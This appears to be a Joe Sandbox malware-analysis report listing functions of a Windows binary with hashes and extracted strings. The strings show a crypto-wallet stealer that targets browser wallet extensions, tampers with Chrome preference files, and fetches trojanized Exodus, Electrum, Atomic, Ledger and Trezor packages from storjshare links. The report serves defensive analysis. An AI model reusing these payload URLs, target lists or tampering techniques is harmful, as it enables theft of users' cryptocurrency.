                                                                                                                                                                  Function 00007FF72C9C21C0 Relevance: 42.7, APIs: 7, Strings: 17, Instructions: 728COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                  • String ID: *L\(&.$+$Could not open Secure Preferences file: $Could not write to Secure Preferences file: $Modified Secure Preferences for profile at $Wallet ID not found in chromeData: $\Secure Preferences$data$extensions$hash$invalid map<K, T> key$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set$macs$protection$settings
                                                                                                                                                                  • API String ID: 3668304517-450133532
                                                                                                                                                                  • Opcode ID: 02461a3e984ef91161d2be9c559aa93aebf3caba056bf3c53884d5cca7ab6e8c
                                                                                                                                                                  • Instruction ID: 7cb086a93cd9f0671af47ab37bb1eb13556af49d4e935112806b2ebadb0b93a4
                                                                                                                                                                  • Opcode Fuzzy Hash: 02461a3e984ef91161d2be9c559aa93aebf3caba056bf3c53884d5cca7ab6e8c
                                                                                                                                                                  • Instruction Fuzzy Hash: 32729572A19BC245EB20EF24DC443EDA361FB65BA8FC04132DA9D57A99DF78D640CB10
                                                                                                                                                                  Function 00007FF72C9C2EF0 Relevance: 28.6, APIs: 4, Strings: 12, Instructions: 635COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                  • String ID: %$*L\(&.$Could not open Preferences file: $Could not write to Preferences file: $Pinned wallets for profile at $\Preferences$developer_mode$extensions$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set$pinned_extensions
                                                                                                                                                                  • API String ID: 3668304517-85695423
                                                                                                                                                                  • Opcode ID: 642685468c0063d75f8d6ad63f1283431a65a6e43144c73b7d25cfcd0eb507a1
                                                                                                                                                                  • Instruction ID: 2f90f29b64499dee171e23b173db4d15157fbf2a9bcde2f5dd6590ff7315cc23
                                                                                                                                                                  • Opcode Fuzzy Hash: 642685468c0063d75f8d6ad63f1283431a65a6e43144c73b7d25cfcd0eb507a1
                                                                                                                                                                  • Instruction Fuzzy Hash: EA62A332A18BC195EB20EF24DC443EDA361FB69B68F844132DA8D47B99DF78D640CB50
                                                                                                                                                                  Function 00007FF72CA152F0 Relevance: 25.7, APIs: 9, Strings: 5, Instructions: 1226COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
                                                                                                                                                                  • String ID: *L\(&.$1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                  • API String ID: 808467561-2065258574
                                                                                                                                                                  • Opcode ID: 3d47ef9bc52971a2eb8f9da7c71ac82cef6ca133624d0f3e8089cfb8152a00f3
                                                                                                                                                                  • Instruction ID: f0a9553573498df6ddee613b8489630c9f94fc1bf488ed1477779ae2b9aecef1
                                                                                                                                                                  • Opcode Fuzzy Hash: 3d47ef9bc52971a2eb8f9da7c71ac82cef6ca133624d0f3e8089cfb8152a00f3
                                                                                                                                                                  • Instruction Fuzzy Hash: 42B2E772E182928BE764DF64E940BFCB7B1FB64394F846135DA0D57A84DBB8A900CF50
                                                                                                                                                                  Function 00007FF72C9BD8A6 Relevance: 25.3, APIs: 3, Strings: 11, Instructions: 775COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$__std_fs_code_page
                                                                                                                                                                  • String ID: Directory: $ $ (User: $.lnk$.zip$Atomic$C:\Users\Public\Desktop\$Electrum$Wallet: $\resources\app\assets\index.js$atomic.exe
                                                                                                                                                                  • API String ID: 4261731725-342767286
                                                                                                                                                                  • Opcode ID: e006c58df6e181a62bdbf6a3b1fe6c1ab3205dde32a769c5e87dae4e1891299d
                                                                                                                                                                  • Instruction ID: 4527887c80326ae533231d11d97c59b27ecb804cb51d561f20359d0d325e3f19
                                                                                                                                                                  • Opcode Fuzzy Hash: e006c58df6e181a62bdbf6a3b1fe6c1ab3205dde32a769c5e87dae4e1891299d
                                                                                                                                                                  • Instruction Fuzzy Hash: 6B826362A18BC591EA20DB18E8443AEF365FB957B4F904321D6EC07AD9DF7CE580DB10
                                                                                                                                                                  Function 00007FF72C9BE4AA Relevance: 25.3, APIs: 3, Strings: 11, Instructions: 775COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                  • String ID: Directory: $ $ (User: $.lnk$.zip$Atomic$C:\Users\Public\Desktop\$Electrum$Wallet: $\resources\app\assets\index.js$atomic.exe
                                                                                                                                                                  • API String ID: 3668304517-342767286
                                                                                                                                                                  • Opcode ID: cfbfe38844ac1249446e3b2dc8f8e8cff92513fb2fbe900c48d6925224fc0cb8
                                                                                                                                                                  • Instruction ID: 14f51189973f94bcfdc0d9a1464daedf4057478352dd825c841848249fd35d5b
                                                                                                                                                                  • Opcode Fuzzy Hash: cfbfe38844ac1249446e3b2dc8f8e8cff92513fb2fbe900c48d6925224fc0cb8
                                                                                                                                                                  • Instruction Fuzzy Hash: C5826362A18BC591EA20DB18E8443AEF365FB957B4F904321D6EC07AD9DF7CE580DB10
                                                                                                                                                                  Function 00007FF72C9B13D0 Relevance: 25.2, Strings: 20, Instructions: 210COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                                                                                                  • String ID: 1Gl-tclZiwzl6g0KiESfdjoxWpKS4etTy$1PawyaJNdMeRZ58R98lDRBDFhVGrvATkk$1Q8Qas1_ewfzUMTS1hokwKRwiYzLHSrWN$1T6M8C2frvgzxZ5QXvqg3JwQUquC0rvYi$1Wvj4ujXtbazj3MOxU05QXrkL4bCHwl2J$1XbWC5eWnyEZCUtT5_ZxFbRnbH9aKnawV$1Zz3U8oG_dniKMFaigIhNDA-r_Qxo1qXX$1hpFGL_MKbqCzc4V3YaZ29A4JaDrWxIN2$1lRNFMUWkcGIGS67XkeWfhXMPjev6B5Cg$1mwoKtHlgA_FGSglUyMP1ZtIPsSVHtwF1$aholpfdialjgjfhomihkjbmgjidlcdno$bfnaelmomeimhlpmgjnjophhpkkoljpa$efbglgofoippbgcjepnhiblaibcnclgk$egjidjbpglichdcondbcbdnbeeppgdph$fnjhmkhhmkbjkkabndcnnogagogbneec$hifafgmccdpekplomjjkcfgodnhcellj$hnfanknocfeofbddgcijnmhnfnkdnaad$lpfcbjknijpeeillifnkikgncikgfhdo$mcohilncbfahbmgdjkbpemcciiolgcge$nkbihfbeogaeaoehlefnkodbefgpgknn
                                                                                                                                                                  • API String ID: 73155330-2179249122
                                                                                                                                                                  • Opcode ID: 918cb4a1bcb761b1dfa28e1cb2a0f5d410f0230b9cf2e836c29f87e62ae8fd36
                                                                                                                                                                  • Instruction ID: 0d0d91f5f92346421aa3ffd5dc5842b338165759f49d59effb6c2131a392a14f
                                                                                                                                                                  • Opcode Fuzzy Hash: 918cb4a1bcb761b1dfa28e1cb2a0f5d410f0230b9cf2e836c29f87e62ae8fd36
                                                                                                                                                                  • Instruction Fuzzy Hash: 3AA17752D64BCA45E721EB35DC826F59361FBFA358F906326E58C31856EFA8E2C48700
                                                                                                                                                                  Function 00007FF72C9B1000 Relevance: 25.2, Strings: 20, Instructions: 202COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                                                                                                  • String ID: Coinbase$Crypto$Exodus$Martian$MetaMask$Nami$OKX Wallet$Phantom$Ronin Wallet$Trust Wallet$aholpfdialjgjfhomihkjbmgjidlcdno$bfnaelmomeimhlpmgjnjophhpkkoljpa$efbglgofoippbgcjepnhiblaibcnclgk$egjidjbpglichdcondbcbdnbeeppgdph$fnjhmkhhmkbjkkabndcnnogagogbneec$hifafgmccdpekplomjjkcfgodnhcellj$hnfanknocfeofbddgcijnmhnfnkdnaad$lpfcbjknijpeeillifnkikgncikgfhdo$mcohilncbfahbmgdjkbpemcciiolgcge$nkbihfbeogaeaoehlefnkodbefgpgknn
                                                                                                                                                                  • API String ID: 73155330-809053197
                                                                                                                                                                  • Opcode ID: 558d78c46f37a75caeecddcf5e82f011c461c1e932c5431e2adaf8b63981ecbf
                                                                                                                                                                  • Instruction ID: b59b93d08e4d27369a5c5db7593a7f62206302fab931c5abcbc5bf303ee1c8be
                                                                                                                                                                  • Opcode Fuzzy Hash: 558d78c46f37a75caeecddcf5e82f011c461c1e932c5431e2adaf8b63981ecbf
                                                                                                                                                                  • Instruction Fuzzy Hash: 19A18652D64BCA45E721EB35DC823F59361FBFA358F906326A98C31856EF68B2C0C740
                                                                                                                                                                  Function 00007FF72C9DEA20 Relevance: 18.5, APIs: 4, Strings: 6, Instructions: 1017COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task
                                                                                                                                                                  • String ID: *L\(&.$Duplicate key: '$Missing ',' or '}' in object declaration$Missing ':' after object member name$Missing '}' or object member name$keylength >= 2^30
                                                                                                                                                                  • API String ID: 3936042273-301814230
                                                                                                                                                                  • Opcode ID: 3ca0b70c201c01edbafebc8ecc7c04cf026a87ae70d3d4e791b0ae799261a8b7
                                                                                                                                                                  • Instruction ID: 73eca298609e22d1686823374721d63641ca4bf60e28ca21295a26daaa31cdb5
                                                                                                                                                                  • Opcode Fuzzy Hash: 3ca0b70c201c01edbafebc8ecc7c04cf026a87ae70d3d4e791b0ae799261a8b7
                                                                                                                                                                  • Instruction Fuzzy Hash: 47920522F0864241FA14BB25DC593BDA365EFA1BA4FC54131DA9E27BD9CE3DE440CB20
                                                                                                                                                                  Function 00007FF72C9E1F30 Relevance: 15.6, Strings: 12, Instructions: 602COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: allowComments$allowDroppedNullPlaceholders$allowNumericKeys$allowSingleQuotes$allowSpecialFloats$allowTrailingCommas$collectComments$failIfExtra$rejectDupKeys$skipBom$stackLimit$strictRoot
                                                                                                                                                                  • API String ID: 0-1055134397
                                                                                                                                                                  • Opcode ID: be4f296389bcc298586d0f63bb77cb991da61a374aae5103196b6d034a1b943b
                                                                                                                                                                  • Instruction ID: 4e5555ee050762433299fb3d07ab561958dfc0431ee338829d4bd3dc980f6511
                                                                                                                                                                  • Opcode Fuzzy Hash: be4f296389bcc298586d0f63bb77cb991da61a374aae5103196b6d034a1b943b
                                                                                                                                                                  • Instruction Fuzzy Hash: 78328011F1C9A245FB14FA65DC617FA9361EFB1B64FC84032D98E17A9ACE2DE401CB60
                                                                                                                                                                  Function 00007FF72CA1474C Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 171COMMONLIBRARYCODE
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Value$Locale$CodeErrorInfoLastPageValid$DefaultEnumLocalesProcessSystemUser
                                                                                                                                                                  • String ID: *L\(&.
                                                                                                                                                                  • API String ID: 2591520935-578493202
                                                                                                                                                                  • Opcode ID: 2878fbc5c396ee5e1fe35ef6d9544df04de342239e79658c11acb42aedf89ba9
                                                                                                                                                                  • Instruction ID: 7bf2f0a2091ff909646b4dc0150199ad3789e5f9b98ae9408754e2d1317442e5
                                                                                                                                                                  • Opcode Fuzzy Hash: 2878fbc5c396ee5e1fe35ef6d9544df04de342239e79658c11acb42aedf89ba9
                                                                                                                                                                  • Instruction Fuzzy Hash: E7719D32F186528AFB10AB68EC10BBCA3B0FF64768F845135CA1D53694DF7CA845CB61
                                                                                                                                                                  Function 00007FF72C9ED410 Relevance: 12.9, Strings: 10, Instructions: 352COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: All$commentStyle$dropNullPlaceholders$emitUTF8$enableYAMLCompatibility$indentation$precision$precisionType$significant$useSpecialFloats
                                                                                                                                                                  • API String ID: 0-3087533615
                                                                                                                                                                  • Opcode ID: 6ccfe0fd44179b31ec7d352dca0fb3121aaa09fda5683eb3f39eab8598ff935f
                                                                                                                                                                  • Instruction ID: 8c04e90dd699c886b41270057d7a0bd53159729ccb3d56ff92f4c84462a5a576
                                                                                                                                                                  • Opcode Fuzzy Hash: 6ccfe0fd44179b31ec7d352dca0fb3121aaa09fda5683eb3f39eab8598ff935f
                                                                                                                                                                  • Instruction Fuzzy Hash: 3AE15021F1C55241FA04FB65EC617FA9365EFB1B64FC84032D98E17A9ACE2DE501CBA0
                                                                                                                                                                  Function 00007FF72C9B17A0 Relevance: 12.6, Strings: 10, Instructions: 142COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                                                                                                  • String ID: Atomic Wallet$C:\Program Files (x86)\Electrum$C:\Program Files\Ledger Live$C:\Users\%s\AppData\Local\Programs\Trezor Suite$C:\Users\%s\AppData\Local\Programs\atomic$C:\Users\%s\AppData\Local\exodus$Electrum$Exodus$Ledger Live$Trezor
                                                                                                                                                                  • API String ID: 73155330-2810031701
                                                                                                                                                                  • Opcode ID: 4450588106a22513a7071f97054245c153194049d8708fd02ee4cb1c0438b041
                                                                                                                                                                  • Instruction ID: 16c697cc9a239343c64a031f8ea7dfbc511dbab4a6c6561dd160e7d6ff38581d
                                                                                                                                                                  • Opcode Fuzzy Hash: 4450588106a22513a7071f97054245c153194049d8708fd02ee4cb1c0438b041
                                                                                                                                                                  • Instruction Fuzzy Hash: 0F61A452D28F8681E710EB30EC827B89371FBEA358F905335E98C62456DF6CE684CB54
                                                                                                                                                                  Function 00007FF72C9B1A20 Relevance: 12.6, Strings: 10, Instructions: 117COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  • Exodus, xrefs: 00007FF72C9B1A49
                                                                                                                                                                  • https://link.storjshare.io/s/jx3obcnqgxa2u364c52wel6vrxba/cardan-shafts/Trazor%20(Software).zip?download=1, xrefs: 00007FF72C9B1B0E
                                                                                                                                                                  • https://link.storjshare.io/s/jvbdgt4oiad73vsmb56or2qtzcta/cardan-shafts/Exodus%20(Software)(1).zip?download=1, xrefs: 00007FF72C9B1A72
                                                                                                                                                                  • https://link.storjshare.io/s/jvs5vlroulyshzqirwqzg7wys2wq/cardan-shafts/Atomic%20(Software)(2).zip?download=1, xrefs: 00007FF72C9B1AC2
                                                                                                                                                                  • https://link.storjshare.io/s/jvrb5lh3pynx3et56bisfuuguvoq/cardan-shafts/Electrum%20(Software)(1).zip?download=1, xrefs: 00007FF72C9B1BA6
                                                                                                                                                                  • Ledger Live, xrefs: 00007FF72C9B1B34
                                                                                                                                                                  • Electrum, xrefs: 00007FF72C9B1B80
                                                                                                                                                                  • Atomic, xrefs: 00007FF72C9B1A9B
                                                                                                                                                                  • https://link.storjshare.io/s/jwkj6ktyi5kumzjvhrw6bdbvyceq/cardan-shafts/Ledger%20(Software).zip?download=1, xrefs: 00007FF72C9B1B5A
                                                                                                                                                                  • Trezor, xrefs: 00007FF72C9B1AE8
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                                                                                                  • String ID: Atomic$Electrum$Exodus$Ledger Live$Trezor$https://link.storjshare.io/s/jvbdgt4oiad73vsmb56or2qtzcta/cardan-shafts/Exodus%20(Software)(1).zip?download=1$https://link.storjshare.io/s/jvrb5lh3pynx3et56bisfuuguvoq/cardan-shafts/Electrum%20(Software)(1).zip?download=1$https://link.storjshare.io/s/jvs5vlroulyshzqirwqzg7wys2wq/cardan-shafts/Atomic%20(Software)(2).zip?download=1$https://link.storjshare.io/s/jwkj6ktyi5kumzjvhrw6bdbvyceq/cardan-shafts/Ledger%20(Software).zip?download=1$https://link.storjshare.io/s/jx3obcnqgxa2u364c52wel6vrxba/cardan-shafts/Trazor%20(Software).zip?download=1
                                                                                                                                                                  • API String ID: 73155330-3394481700
                                                                                                                                                                  • Opcode ID: 816de1025622e20637940e3d9587a4f672e075238e006f15cd3371eaf1fa5348
                                                                                                                                                                  • Instruction ID: 9d3bcb516d0de3f3b5b2330a3fd61b8e8d007169e87951d22e352ea6e3bb860a
                                                                                                                                                                  • Opcode Fuzzy Hash: 816de1025622e20637940e3d9587a4f672e075238e006f15cd3371eaf1fa5348
                                                                                                                                                                  • Instruction Fuzzy Hash: E6517552D64F8A85E710EB30EC827B9A371FBEA358F905336E98C72855DF6CA5C08750
                                                                                                                                                                  Function 00007FF72CA13D04 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 227COMMONLIBRARYCODE
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
